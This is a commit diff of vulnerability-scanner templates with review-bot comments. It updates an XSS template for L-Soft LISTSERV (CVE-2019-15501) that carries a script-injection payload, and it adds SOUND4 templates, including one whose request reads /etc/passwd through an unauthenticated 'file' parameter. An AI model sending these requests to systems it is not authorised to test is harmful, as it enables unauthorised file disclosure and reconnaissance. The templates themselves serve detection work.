Merge branch 'main' into uvicorn-detect
commit
e12559a70d
|
@ -9,7 +9,6 @@ reviewers:
|
||||||
- ritikchaddha
|
- ritikchaddha
|
||||||
- DhiyaneshGeek
|
- DhiyaneshGeek
|
||||||
- pussycat0x
|
- pussycat0x
|
||||||
- princechaddha
|
|
||||||
|
|
||||||
# A number of reviewers added to the pull request
|
# A number of reviewers added to the pull request
|
||||||
# Set 0 to add all the reviewers (default: 0)
|
# Set 0 to add all the reviewers (default: 0)
|
||||||
|
@ -17,9 +16,9 @@ numberOfReviewers: 1
|
||||||
|
|
||||||
# A list of assignees, overrides reviewers if set
|
# A list of assignees, overrides reviewers if set
|
||||||
assignees:
|
assignees:
|
||||||
- ritikchaddha
|
|
||||||
- DhiyaneshGeek
|
- DhiyaneshGeek
|
||||||
- pussycat0x
|
- pussycat0x
|
||||||
|
- ritikchaddha
|
||||||
|
|
||||||
# A number of assignees to add to the pull request
|
# A number of assignees to add to the pull request
|
||||||
# Set to 0 to add all of the assignees.
|
# Set to 0 to add all of the assignees.
|
||||||
|
|
|
@ -1 +1,3 @@
|
||||||
cves/2022/CVE-2022-1168.yaml
|
cves/2022/CVE-2022-1168.yaml
|
||||||
|
vulnerabilities/other/sound4-file-disclosure.yaml
|
||||||
|
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
|
||||||
|
|
|
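Review bot: The second added entry, `"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"`, starts with the byte sequence E2 80 8E twice, which is U+200E (LEFT-TO-RIGHT MARK) repeated before `misconfiguration/`. The template is therefore listed under a directory whose name contains two invisible characters, not under the regular `misconfiguration/` directory, and it will look identical to the real path in most viewers. Move the file to `misconfiguration/sound4-directory-listing.yaml` and list it here unquoted, the same way `vulnerabilities/other/sound4-file-disclosure.yaml` is listed.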
@ -2,9 +2,10 @@ id: CVE-2019-15501
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||||
author: LogicalHunter
|
author: LogicalHunter,arafatansari
|
||||||
severity: medium
|
severity: medium
|
||||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
description: |
|
||||||
|
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/47302
|
- https://www.exploit-db.com/exploits/47302
|
||||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||||
|
@ -14,6 +15,9 @@ info:
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2019-15501
|
cve-id: CVE-2019-15501
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"LISTSERV"
|
||||||
|
verified: "true"
|
||||||
tags: cve,cve2019,xss,listserv,edb
|
tags: cve,cve2019,xss,listserv,edb
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -24,9 +28,12 @@ requests:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- '</script><script>alert(document.domain)</script>'
|
- '</script><script>alert(document.domain)</script>'
|
||||||
part: body
|
- 'LISTSERV'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
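Review bot: `case-insensitive: true` on the body matcher applies to every entry under `words`, so the reflected payload `</script><script>alert(document.domain)</script>` is now also compared without regard to case, not just the new `LISTSERV` string. If only the product banner needs loose matching, put `LISTSERV` in its own word matcher with `case-insensitive: true` and keep the payload match exact; `matchers-condition: and` already ties the matchers together.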
@ -1 +1 @@
|
||||||
5.3.6
|
5.3.8
|
|
@ -1 +1 @@
|
||||||
4.5.4
|
4.5.5
|
|
@ -3681,3 +3681,8 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "uvicorn"
|
- "uvicorn"
|
||||||
|
|
||||||
|
name: tornado
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "TornadoServer/"
|
|
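Review bot: The added block begins at `name: tornado` after a blank line, with no `- type: word` line in front of it, so as shown these keys do not open a new matcher item after the `uvicorn` one. Add `- type: word` ahead of `name: tornado`, or confirm it is present in the file; without it `name`, `part` and `words` repeat keys of the preceding matcher.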
@ -0,0 +1,30 @@
|
||||||
|
id: sound4-file-disclosure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
|
||||||
|
author: arafatansari
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
|
||||||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"SOUND4"
|
||||||
|
verified: "true"
|
||||||
|
tags: packetstorm,lfi,sound4,unauth,disclosure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
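Review bot: The `description` opens with "The application suffers from" and never names the product or the `/cgi-bin/loghandler.php` endpoint that the request targets; the product appears only in `name`. State both in the description so the finding is readable on its own in scan output. Separately, `severity: medium` is the same rating given to the directory listing template in this commit, although this one reads arbitrary files without authentication through the `file` parameter; confirm the rating is intended.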
@ -0,0 +1,32 @@
|
||||||
|
id: sound4-directory-listing
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure
|
||||||
|
author: arafatansari
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html
|
||||||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"SOUND4"
|
||||||
|
tags: misconfig,listing,sound4,disclosure,packetstorm
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/log/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Index of /log</title>"
|
||||||
|
- "Parent Directory"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
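Review bot: Under `metadata`, `verified: true` is a YAML boolean here, while the other two templates touched in this commit (CVE-2019-15501 and sound4-file-disclosure) use the quoted string `verified: "true"`, and the key order (`verified` before `shodan-query`) is also reversed relative to them. Use one form across the three files. The word matcher also has no `part:` key, unlike the body matcher in CVE-2019-15501; adding `part: body` makes explicit where `<title>Index of /log</title>` and `Parent Directory` are expected.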